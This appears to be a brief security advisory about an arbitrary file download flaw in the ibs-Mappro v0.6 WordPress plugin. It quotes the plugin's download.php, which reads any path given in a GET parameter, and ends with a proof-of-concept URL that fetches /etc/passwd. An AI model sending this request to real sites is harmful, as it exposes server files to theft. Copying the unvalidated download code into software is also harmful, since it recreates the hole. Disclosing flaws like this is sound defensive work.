Title:Arbitrary file download vulnerability in ibs-Mappro v0.6 Wordpress plugin
the download.php script allows any remote user to download files off of the server:
if (isset($_GET)) {
    $filename = $_GET['file'];
    $info = pathinfo($filename);
    $name = $info['basename'];
    if (file_exists($filename)) {
        header('Set-Cookie: fileDownload=true; path=/');
        header('Cache-Control: max-age=60, must-revalidate');
        header('Content-Disposition: attachment; filename="' . $title . '-' . $timestamp . '.csv"');
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . $name . '"');
        header('Content-Transfer-Encoding: binary');
        header('Expires: 0');
        header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
        header('Pragma: public');
        header('Content-Length: ' . filesize($filename));
        ob_clean();
        flush();
        readfile($filename);
        exit;
    } else {
        die;
    }
} else {
    die;
}
?>http://example.com/wp-content/plugins/ibs-mappro/lib/download.php?file=/etc/passwd